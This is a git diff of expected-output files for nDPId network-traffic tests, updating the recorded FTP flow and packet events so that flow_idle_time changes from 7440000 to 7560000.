-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ftp-start-tls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1383123629078,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1383123629078,"pkt":"AAAAEAAU3NL8+wOhCABFAAAs+dJAAD0G4b8K3DJMCu4aJAAV8owdfc81M0JQi2ASwAASugAAAgQFtAAA"} -00816{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"ftp-start-tls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1383123629078,"flow_last_seen":1383123629098,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1383123629098,"l3_proto":"ip4","src_ip":"10.238.26.36","dst_ip":"10.220.50.76","src_port":62092,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} -00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":51,"source":"ftp-start-tls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":51,"flow_first_seen":1383123629078,"flow_last_seen":1383123629412,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":4690,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1383123629412,"l3_proto":"ip4","src_ip":"10.238.26.36","dst_ip":"10.220.50.76","src_port":62092,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"}} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ftp-start-tls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383123629078,"flow_last_seen":1383123629078,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1383123629078,"l3_proto":"ip4","src_ip":"10.238.26.36","dst_ip":"10.220.50.76","src_port":62092,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ftp-start-tls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1383123629078,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1383123629078,"pkt":"AAAAEAAU3NL8+wOhCABFOAAs3ocAAP8GetIK7hokCtwyTPKMABUzQlCKAAAAAGACIACjMgAAAgQCAAAA"} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ftp-start-tls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1383123629078,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1383123629078,"pkt":"AAAAEAAU3NL8+wOhCABFAAAs+dJAAD8G378K3DJMCu4aJAAV8owdfc81M0JQi2ASwAASugAAAgQFtAAA"} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ftp-start-tls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1383123629078,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1383123629078,"pkt":"AAAAEAAU3NL8+wOhCABFAAAs+dJAAD0G4b8K3DJMCu4aJAAV8owdfc81M0JQi2ASwAASugAAAgQFtAAA"} +00816{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"ftp-start-tls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1383123629078,"flow_last_seen":1383123629098,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1383123629098,"l3_proto":"ip4","src_ip":"10.238.26.36","dst_ip":"10.220.50.76","src_port":62092,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} +00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":51,"source":"ftp-start-tls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":51,"flow_first_seen":1383123629078,"flow_last_seen":1383123629412,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":4690,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1383123629412,"l3_proto":"ip4","src_ip":"10.238.26.36","dst_ip":"10.220.50.76","src_port":62092,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"}} 00558{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":51,"source":"ftp-start-tls.pcap","alias":"nDPId-test","packets-captured":51,"packets-processed":51,"total-skipped-flows":0,"total-l4-data-len":4690,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1383123629412} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 51/51 diff --git a/test/results/ftp.pcap.out b/test/results/ftp.pcap.out index 564e81a63..1a0a7c92d 100644 --- a/test/results/ftp.pcap.out +++ b/test/results/ftp.pcap.out @@ -1,23 +1,23 @@ 00454{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"ftp.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00540{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"ftp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1552590234892} -00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ftp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1552590234892,"flow_last_seen":1552590234892,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1552590234892,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50694,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ftp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1552590234892,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1552590234892,"pkt":"EBMx8Tl2xCwDBkn+CABFAABAAABAAEAGAADAqAHUWoJGScYGABWjI5ftAAAAALAC\/\/9jegAAAgQFtAEDAwUBAQgKO1eYmQAAAAAEAgAA"} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ftp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1552590234919,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1552590234919,"pkt":"xCwDBkn+EBMx8Tl2CABFAAA8AABAADYG4XRagkZJwKgB1AAVxgZYKsHSoyOX7qASqbA+KAAAAgQFrAQCCAoSZ\/tNO1eYmQEDAw4="} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ftp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1552590234919,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1552590234919,"pkt":"EBMx8Tl2xCwDBkn+CABFAAA0AABAAEAGAADAqAHUWoJGScYGABWjI5fuWCrB04AQECxjbgAAAQEICjtXmLQSZ\/tN"} -00821{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"ftp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1552590234892,"flow_last_seen":1552590235066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":106,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1552590235066,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50694,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"anonymous","password":"NcFTP@","auth_failed":0}} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"ftp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1552590236580,"flow_last_seen":1552590236580,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1552590236580,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50695,"dst_port":25685,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"ftp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1552590236580,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1552590236580,"pkt":"EBMx8Tl2xCwDBkn+CABFAABAAABAAEAGAADAqAHUWoJGScYHZFXuwKKMAAAAALAC\/\/9jegAAAgQFtAEDAwUBAQgKO1efIQAAAAAEAgAA"} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"ftp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1552590236608,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1552590236608,"pkt":"xCwDBkn+EBMx8Tl2CABFAAA8AABAADYG4XRagkZJwKgB1GRVxgdmK2Nw7sCijaASqbDL3QAAAgQFrAQCCAoSZ\/zzO1efIQEDAw4="} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"ftp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1552590236608,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1552590236608,"pkt":"EBMx8Tl2xCwDBkn+CABFAAA0AABAAEAGAADAqAHUWoJGScYHZFXuwKKNZitjcYAQECxjbgAAAQEICjtXnzkSZ\/zz"} -00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"ftp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1552590236580,"flow_last_seen":1552590236637,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1205,"flow_tot_l4_payload_len":1205,"flow_avg_l4_payload_len":301,"midstream":0,"thread_ts_msec":1552590236637,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50695,"dst_port":25685,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"FTP_DATA","breed":"Acceptable","category":"Download"}} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":66,"source":"ftp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1552590241545,"flow_last_seen":1552590241545,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1552590241545,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50696,"dst_port":24523,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"ftp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1552590241545,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1552590241545,"pkt":"EBMx8Tl2xCwDBkn+CABFAABAAABAAEAGAADAqAHUWoJGScYIX8sNBxpOAAAAALAC\/\/9jegAAAgQFtAEDAwUBAQgKO1eyYgAAAAAEAgAA"} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"ftp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1552590241573,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1552590241573,"pkt":"xCwDBkn+EBMx8Tl2CABFAAA8AABAADYG4XRagkZJwKgB1F\/LxggMTnkwDQcaT6ASqbBmYgAAAgQFrAQCCAoSaAHMO1eyYgEDAw4="} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"ftp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1552590241573,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1552590241573,"pkt":"EBMx8Tl2xCwDBkn+CABFAAA0AABAAEAGAADAqAHUWoJGScYIX8sNBxpPDE55MYAQECxjbgAAAQEICjtXsn0SaAHM"} -00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":100,"source":"ftp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1552590241545,"flow_last_seen":1552590241639,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":24480,"flow_avg_l4_payload_len":765,"midstream":0,"thread_ts_msec":1552590241639,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50696,"dst_port":24523,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00640{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1192,"source":"ftp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1115,"flow_first_seen":1552590241545,"flow_last_seen":1552590241878,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1048576,"flow_avg_l4_payload_len":940,"midstream":0,"thread_ts_msec":1552590243371,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50696,"dst_port":24523,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} -00800{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1192,"source":"ftp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":68,"flow_first_seen":1552590234892,"flow_last_seen":1552590243371,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":241,"flow_tot_l4_payload_len":1063,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1552590243371,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50694,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"}} -00826{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1192,"source":"ftp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1552590236580,"flow_last_seen":1552590236666,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1205,"flow_tot_l4_payload_len":1205,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1552590243371,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50695,"dst_port":25685,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"FTP_DATA","breed":"Acceptable","category":"Download"}} +00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ftp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1552590234892,"flow_last_seen":1552590234892,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1552590234892,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50694,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ftp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1552590234892,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1552590234892,"pkt":"EBMx8Tl2xCwDBkn+CABFAABAAABAAEAGAADAqAHUWoJGScYGABWjI5ftAAAAALAC\/\/9jegAAAgQFtAEDAwUBAQgKO1eYmQAAAAAEAgAA"} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ftp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1552590234919,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1552590234919,"pkt":"xCwDBkn+EBMx8Tl2CABFAAA8AABAADYG4XRagkZJwKgB1AAVxgZYKsHSoyOX7qASqbA+KAAAAgQFrAQCCAoSZ\/tNO1eYmQEDAw4="} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ftp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1552590234919,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1552590234919,"pkt":"EBMx8Tl2xCwDBkn+CABFAAA0AABAAEAGAADAqAHUWoJGScYGABWjI5fuWCrB04AQECxjbgAAAQEICjtXmLQSZ\/tN"} +00821{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"ftp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1552590234892,"flow_last_seen":1552590235066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":106,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1552590235066,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50694,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"anonymous","password":"NcFTP@","auth_failed":0}} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"ftp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1552590236580,"flow_last_seen":1552590236580,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1552590236580,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50695,"dst_port":25685,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"ftp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1552590236580,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1552590236580,"pkt":"EBMx8Tl2xCwDBkn+CABFAABAAABAAEAGAADAqAHUWoJGScYHZFXuwKKMAAAAALAC\/\/9jegAAAgQFtAEDAwUBAQgKO1efIQAAAAAEAgAA"} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"ftp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1552590236608,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1552590236608,"pkt":"xCwDBkn+EBMx8Tl2CABFAAA8AABAADYG4XRagkZJwKgB1GRVxgdmK2Nw7sCijaASqbDL3QAAAgQFrAQCCAoSZ\/zzO1efIQEDAw4="} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"ftp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1552590236608,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1552590236608,"pkt":"EBMx8Tl2xCwDBkn+CABFAAA0AABAAEAGAADAqAHUWoJGScYHZFXuwKKNZitjcYAQECxjbgAAAQEICjtXnzkSZ\/zz"} +00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"ftp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1552590236580,"flow_last_seen":1552590236637,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1205,"flow_tot_l4_payload_len":1205,"flow_avg_l4_payload_len":301,"midstream":0,"thread_ts_msec":1552590236637,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50695,"dst_port":25685,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"FTP_DATA","breed":"Acceptable","category":"Download"}} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":66,"source":"ftp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1552590241545,"flow_last_seen":1552590241545,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1552590241545,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50696,"dst_port":24523,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"ftp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1552590241545,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1552590241545,"pkt":"EBMx8Tl2xCwDBkn+CABFAABAAABAAEAGAADAqAHUWoJGScYIX8sNBxpOAAAAALAC\/\/9jegAAAgQFtAEDAwUBAQgKO1eyYgAAAAAEAgAA"} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"ftp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1552590241573,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1552590241573,"pkt":"xCwDBkn+EBMx8Tl2CABFAAA8AABAADYG4XRagkZJwKgB1F\/LxggMTnkwDQcaT6ASqbBmYgAAAgQFrAQCCAoSaAHMO1eyYgEDAw4="} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"ftp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1552590241573,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1552590241573,"pkt":"EBMx8Tl2xCwDBkn+CABFAAA0AABAAEAGAADAqAHUWoJGScYIX8sNBxpPDE55MYAQECxjbgAAAQEICjtXsn0SaAHM"} 